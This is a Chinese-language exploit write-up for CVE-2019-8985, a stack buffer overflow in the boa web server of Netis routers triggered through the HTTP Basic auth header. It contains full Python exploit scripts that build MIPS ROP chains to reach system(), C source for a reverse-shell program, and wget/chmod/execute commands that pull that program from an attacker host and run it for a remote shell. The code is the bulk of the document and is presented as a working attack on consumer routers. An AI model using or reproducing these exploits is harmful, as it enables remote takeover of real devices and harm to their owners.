CVE–2019–8985 Netis WF2411 RCE detail

CVE recur

# 环境搭建

固件获取 WF2419
Fetching Title#sw0w
选择 WF2419(2.2.36123)

先逆向分析 boa
漏洞点

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
loc_4145D8:              # s
addiu   $a0, $sp, 0x60+var_40
li      $a1, 0x420000
nop
addiu   $a1, (aSS_0 - 0x420000)  # "%s:%s"
move    $a2, $s0
move    $a3, $s4
la      $t9, sprintf
nop
jalr    $t9 ; sprintf
nop
lw      $gp, 0x60+var_48($sp)
nop
li      $s3, 0x460000
nop
addiu   $s3, (byte_4596D0 - 0x460000)
lbu     $v0, 0x60+var_40($sp)
nop
addiu   $s2, $v0, -0x3A
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
int __fastcall user_ok(const char *a1, const char *a2)
{
  int v4; // $s1
  int result; // $v0
  int v6; // $s2
  int v7; // $v0
  const char *v8; // $s0
  bool v9; // dc
  char v10[64]; // [sp+20h] [-40h] BYREF

  memset(v10, 0, sizeof(v10));
  v4 = 0;
  if ( get_password(64) >= 0 )
  {
    sprintf(v10, "%s:%s", a1, a2);
    v6 = (unsigned __int8)v10[0] - 58;
    while ( 1 )
    {
      v7 = v4 << 6;
      if ( byte_4596D0[64 * v4] == 58 && !v6 )
        break;
      v8 = &byte_4596D0[v7];
      if ( strlen(&byte_4596D0[v7]) >= 2 )
      {
        v9 = strcmp(v10, v8) == 0;
        result = 1;
        if ( v9 )
          return result;
      }
      if ( ++v4 > 0 )
      {
        fprintf(stderr, "check password error,log_passwd=%s;passwd=%s\n", a2, byte_4596D0);
        return 0;
      }
    }
    return 1;
  }
  else
  {
    fprintf(stderr, "%s:%s:%d;get password error!\n", "htauth.c", "user_ok", 74);
    return 1;
  }
}

启动 boa 的时候可以检查下配置文件

1
2
3
4
5
6
7
8
9
➜  sqrootfs file bin/busybox         
bin/busybox: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped
➜  sqrootfs cp $(which qemu-mips) .
➜  sqrootfs grep -r "boa -" .                   
./bin/webs:	/bin/boa -p /web -f /etc/boa.conf &
grep: ./var/run/webs.pid: Permission denied
➜  sqrootfs sudo chroot . ./qemu-mips /bin/boa -p /web -f /etc/boa.conf
[sudo] password for squ: 
Starting Protocol Module: HTTP Server                      ... OK

如果出现不能缺失 /dev/null 的问题
可以 sudo mknod -m 666 dev/null c 1 3
如果出现 can't create PID file
可以 md var/run

然后可以打个 PoC 试试看

1
wget --http-user=a --http-password=$(python -c 'print "a"*0x80') http://127.0.0.1

可以看到报错信息如下

1
2
3
4
translate_uri:222;Wget/1.19.4 (linux-gnu)
translate_uri:254
translate_uri:256
htauth.c:user_auth:181;get password error!

✨TODO

逆向一下可以发现要打开一个 passwd

1
v2 = fopen("/tmp/passwd", "r+");

cp 本地的过去

1
cp /etc/passwd ./tmp

在 wget 一下 可以看到崩溃

1
2
3
4
check password error,log_passwd=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;passwd=root:x:0:0:root:/root:/bin/bash
caught SIGSEGV, dumping core in /var/boa
qemu: uncaught target signal 6 (Aborted) - core dumped
[1]    49014 abort      sudo chroot . ./qemu-mips /bin/boa -p /web -f /etc/boa.conf

# 漏洞分析

rasp + 0x14
bufsp - 0x40
也就是 0x54 的 offs
同时我们也需要控制五个寄存器 s0 ~ s5 这五个调用者保存寄存器
这些寄存器主要是为了劫持返回地址 因为会有 sx 传递给 ax
然后 jalr ax 的 gadget

1
2
3
4
5
6
7
8
.text:004146DC                 lw      $ra, 0x60+var_s14($sp)
.text:004146E0                 lw      $s4, 0x60+var_s10($sp)
.text:004146E4                 lw      $s3, 0x60+var_sC($sp)
.text:004146E8                 lw      $s2, 0x60+var_s8($sp)
.text:004146EC                 lw      $s1, 0x60+var_s4($sp)
.text:004146F0                 lw      $s0, 0x60+var_s0($sp)
.text:004146F4                 jr      $ra
.text:004146F8                 addiu   $sp, 0x78

sprintf 的逆向语句如下

1
sprintf(dest, "%s:%s", username, password);

boa has two loaded libraries, libC and libgcc .

审视一波 libc.so.0

1
2
3
4
5
6
7
8
9
10
11
12
Python>mipsrop.stackfinder()
----------------------------------------------------------------------------------------------------------------
|  Address     |  Action                                              |  Control Jump                          |
----------------------------------------------------------------------------------------------------------------
|  0x000068AC  |  addiu $a0,$sp,0x20+var_8                            |  jalr  $v0                             |
|  0x0000711C  |  addiu $a0,$sp,0x1A0+var_188                         |  jalr  $v0                             |
|  0x000074BC  |  addiu $a0,$sp,0x1A0+var_188                         |  jalr  $v0                             |
|  0x00020660  |  addiu $a0,$sp,0x30+var_18                           |  jalr  $a0                             |
|  0x000071E4  |  addiu $a1,$sp,0x20+var_8                            |  jr    0x20+var_s0($sp)                |
|  0x00008AD4  |  addiu $a1,$sp,0x20+var_8                            |  jr    0x20+var_s0($sp)                |
|  0x0000A3CC  |  addiu $a2,$sp,0x40+var_28                           |  jr    0x40+var_sC($sp)                |
|  0x000125E0  |  addiu $a2,$sp,0x18+arg_8                            |  jr    0x18+var_s0($sp)                |

没有可用的 gadget
再到 libgcc 中找 第二列有 a0 第三列有 s0 ~ s4 就行
找到这个 也就是要确保

  • binsh 地址在 sp + 0x18 (但这个是在执行了 addiu $sp, 0x78 之后的)
  • 而 system 在 s3 (sp + 0xc)
  • ra 在 sp +0x14
1
2
3
4
5
6
.text:0000ABD0                 addiu   $a0, $sp, 0x20+var_8
.text:0000ABD4                 move    $a1, $s2
.text:0000ABD8                 move    $s0, $zero
.text:0000ABDC                 move    $t9, $s3
.text:0000ABE0                 jalr    $t9
.text:0000ABE4                 movz    $s0, $v0, $v1

在 qemu 内模拟

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
  0x400000   0x419000 r-xp    19000 0      /bin/boa
  0x459000   0x45a000 rw-p     1000 19000  /bin/boa
  0x45a000   0x466000 rwxp     c000 0      [heap]
0x77ee2000 0x77eee000 r-xp     c000 0      /lib/libgcc_s_4181.so.1
0x77eee000 0x77f2d000 ---p    3f000 0      [anon_77eee]
0x77f2d000 0x77f2e000 rw-p     1000 b000   /lib/libgcc_s_4181.so.1
0x77f2e000 0x77f6c000 r-xp    3e000 0      /lib/libc.so.0
0x77f6c000 0x77fac000 ---p    40000 0      [anon_77f6c]
0x77fac000 0x77fad000 rw-p     1000 3e000  /lib/libc.so.0
0x77fad000 0x77fb1000 rw-p     4000 0      [anon_77fad]
0x77fb1000 0x77fb7000 r-xp     6000 0      /lib/ld-uClibc.so.0
0x77ff5000 0x77ff6000 rw-p     1000 0      [anon_77ff5]
0x77ff6000 0x77ff7000 r--p     1000 5000   /lib/ld-uClibc.so.0
0x77ff7000 0x77ff8000 rw-p     1000 6000   /lib/ld-uClibc.so.0
0x7f9ee000 0x7fff7000 rwxp   609000 0      [stack]
0x7fff7000 0x7fff8000 r-xp     1000 0      [vdso]

gdb 定位到地址

可以看到由于 boa 的限制 ✨TODO
我们只溢出了 17 个 cmd 的字节命令
而 cmd 需要放在 0x40800368 的位置 也就是 esp + 0x18 0x40800350 + 0x18

从这一段可以看出

1
2
3
4
5
6
7
► 0x4146dc <user_ok+460>    lw     $ra, 0x74($sp)                <0x4146cc>
  0x4146e0 <user_ok+464>    lw     $s4, 0x70($sp)
  0x4146e4 <user_ok+468>    lw     $s3, 0x6c($sp)
  0x4146e8 <user_ok+472>    lw     $s2, 0x68($sp)
  0x4146ec <user_ok+476>    lw     $s1, 0x64($sp)
  0x4146f0 <user_ok+480>    lw     $s0, 0x60($sp)
  0x4146f4 <user_ok+484>    jr     $ra

ra 在 sp + 0x74 的位置
而 jr 之前会做一次 .text:004146F8 addiu $sp, 0x78
而 gadget 里的 cmd 地址是 addiu $a0, $sp, 0x20+var_8
也就是放在 ra 上 0x78 - 0x74 + 0x18 = 0x1c 的位置

exp 如下
s3 的位置是 sp + 0x6c 溢出点离 s0 是 0x40
所以溢出点离 s3 是 0x4c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
import socket
from pwn import *
import struct
import base64

libc   	= 0x77f2e000 
libgcc 	= 0x77ee2000
gadget 	= 0x0000ABD0 + libgcc
system	= 0x0002AC90 + libc
MAXSZ	= 1024
# cmd		= b"FUCK" * 50 # 看看长度
cmd		= b"mkdir hack"
context(arch = "mips", endian = "big", os = "Linux", log_level = "DEBUG")
# fork 0x77f34d30
def exp():
	print(f"[+] gadget is {hex(gadget)}")
	print(f"[+] system is {hex(system)}")
	payload  = b'a:%s' %(b'A' * (0x4C - 2)) # padding + s0~s2
	payload += p32(system)					# s3 <- esp + 0x0c
	payload += b'AAAA'						# s4 
	payload += p32(gadget) 					# ra <- esp + 0x14
	payload += b"BBBB"
	payload += b"BBBB"
	payload += b"BBBB"
	payload += b"BBBB"
	payload += b"BBBB"
	payload += b"BBBB"
	payload += cmd  						# 	 <- esp + 0x30

	header   = b'GET / HTTP/1.1\r\n'
	# header  += b'Host: 127.0.0.1:80\r\n'
	header  += b'Host: 10.10.10.1:80\r\n'
	header  += b'Authorization: Basic %s\r\n' % base64.b64encode(payload)
	header  += b'User-Agent: Real UserAgent\r\n\r\n'


	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	iport = ("10.10.10.1" ,80)
	# iport = ("127.0.0.1" ,80)
	s.connect(iport)
	s.send(header)
	msg = s.recv(MAXSZ)
	print("[+] Message is %s" %(msg))
	s.close()

if __name__ == '__main__':
	exp()

gdb 调试脚本

1
2
3
4
5
set arch mips
set endian big
set solib-search-path sqrootfs/lib/
b *0x4146f4
target remote 10.10.10.1:8888

程序是 chroot 到 /web 页面下了 所以 mkdir 是在 web 下

17 个字节的溢出是很难造成反向 shell 的 也就只能造成一次 17 字节的任意命令执行
重新考虑 rop

# 更好的 ROP

目标 让最后的 a0 尽可能的接近 sp 的位置
已知在 vuln 函数最后 jalr ra 之后 sp 是在 ra 上 4 字节

# gadget2

从 ra 开始到 cmd 结束 有 40 个字节的空区
要充分利用这 40 字节 就需要降低 esp
在 libc 中找到此 gadget
sp - 0x38 + 0x30 - 0x18 = sp - 0x20 的值给 a0 寄存器
然后跳到 先前的 a0 里面去
但是有个问题 sp-0x20 是在 saved 寄存器存放的地方 肯定是很难布置过长的 cmd
而且 a0 不可控 我们需要让 a0 可控

1
2
3
4
5
6
7
8
.text:00020650                 addiu   $sp, -0x38
.text:00020654                 sw      $ra, 0x30+var_s0($sp)
.text:00020658                 sw      $gp, 0x30+var_20($sp)
.text:0002065C                 li      $v0, 2
.text:00020660                 move    $t9, $a0
.text:00020664                 sw      $v0, 0x30+var_18($sp)
.text:00020668                 jalr    $t9
.text:0002066C                 addiu   $a0, $sp, 0x30+var_18

# gadget1

而这个 gadget 依靠 a0 进行跳转 我们需要控制 a0
libgcc 中
我们可以控制 a0 也可以控制跳转地址

1
2
3
.text:00008B20                 move    $t9, $s4
.text:00008B24                 jalr    $t9 ; sub_8770
.text:00008B28                 move    $a0, $s0

# gadget3

同时 栈下去了 影响到我们的 s 寄存器列了 需要抬上来
之前 sp 减去了 0x38 那么这里 + 上 0x1c 的地方可以布置下一个 rop 并把 sp 加上来

1
2
3
4
.init:000017A4                 lw      $ra, 0x1C+var_s0($sp)
.init:000017A8                 nop
.init:000017AC                 jr      $ra
.init:000017B0                 addiu   $sp, 0x20

# gadget4

最后 通过 sp 加上 0x18 的位置将 sp 回复到之前的 sp 一样的地址 并 jalr 到 s3

1
2
3
4
5
6
.text:0000ABD0                 addiu   $a0, $sp, 0x20+var_8
.text:0000ABD4                 move    $a1, $s2
.text:0000ABD8                 move    $s0, $zero
.text:0000ABDC                 move    $t9, $s3
.text:0000ABE0                 jalr    $t9
.text:0000ABE4                 movz    $s0, $v0, $v1

# 流程图

# exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
import socket
from pwn import *
import base64
context(arch = "mips", endian = "big", os = "Linux", log_level = "DEBUG")

libc 	   = 0x77f2e000 
libgcc 	= 0x77ee2000
system	= 0x0002AC90 + libc
gadgets  = [0 ,0x00008B20 ,0x00020650 ,0x000017A4 ,0x0000ABD0]
MAXSZ	   = 1024
cmd		= b"echo 'hacked' > CrimeStatement"

def exp():
	rop = list(map(lambda x: x + libgcc,gadgets))
	rop[2] = rop[2] - libgcc + libc
	for i in range(1,5):
		print(f"[+] rop[{i}] is {hex(rop[i])}")
	print(f"[+] system is {hex(system)}")

	payload  = b'a:%s' %(b'A' * (0x3C - 2))
	payload += p32(rop[4])					# 
	payload += p32(rop[3])					# s0
	payload += b'AAAA'						# s1 
	payload += b'CCCC' 						# s2
	payload += p32(system)					# s3
	payload += p32(rop[2])					# s4
	payload += p32(rop[1])					# ra
	payload += cmd

	header   = b'GET / HTTP/1.1\r\n'
	# header  += b'Host: 127.0.0.1:80\r\n'
	header  += b'Host: 10.10.10.1:80\r\n'
	header  += b'Authorization: Basic %s\r\n' % base64.b64encode(payload)
	header  += b'User-Agent: Real UserAgent\r\n\r\n'


	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	iport = ("10.10.10.1" ,80)
	# iport = ("127.0.0.1" ,80)
	s.connect(iport)
	s.send(header)
	msg = s.recv(MAXSZ)
	print("[+] Message is %s" %(msg))
	s.close()

if __name__ == '__main__':
	exp()

# 做点坏事

既然都拿下了这么长的 cmd
那么不做点坏事也说不过去
busybox 中没有 nc 也没有 bash -i 之类的东西给我们做反向 shell

但是有 wget 下载恶意程序并运行

编写恶意程序 malware (✨TODO 修改参数)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#include <netinet/in.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <unistd.h>
int main(int argc, char **argv){
	int port = atoi(argv[2]);
	char* ip = argv[1];
	int sd = socket(AF_INET, SOCK_STREAM, 0);
	struct sockaddr_in sin = {
		.sin_family = AF_INET,
		.sin_port = htons(port),
		.sin_addr.s_addr = inet_addr(ip),
	};
	connect(sd, (struct sockaddr *)&sin, sizeof(sin));
	for(int _ = 0; _ <= 2; _++) 
		dup2(sd, _);
	execl("/bin/sh", "/bin/sh", NULL);
	return 0;
}
1
mips-linux-gnu-gcc -static -mabi=32 -o malware malware.c

我们需要利用两次漏洞 一次让 malware 可执行 一次让其跑起来(因为长度不够 没法一次性解决)

1
2
3
wget http://10.10.10.2:8000/malware
chmod +x malware
./malware 10.10.10.2 9999

攻击机开启监听
效果如下 成功 getshell

# 未完

1
2
3
4
5
6
7
8
9
➜  squrootfs grep -r "Authorization: Basic " .
Binary file ./bin/updatedd matches
Binary file ./bin/busybox matches
grep: ./var/run/webs.pid: Permission denied
➜  squrootfs grep -r "User-Agent: Real UserAgent" .
grep: ./var/run/webs.pid: Permission denied
➜  squrootfs grep -r "User-Agent: " .              
Binary file ./bin/updatedd matches
Binary file ./bin/busybox matches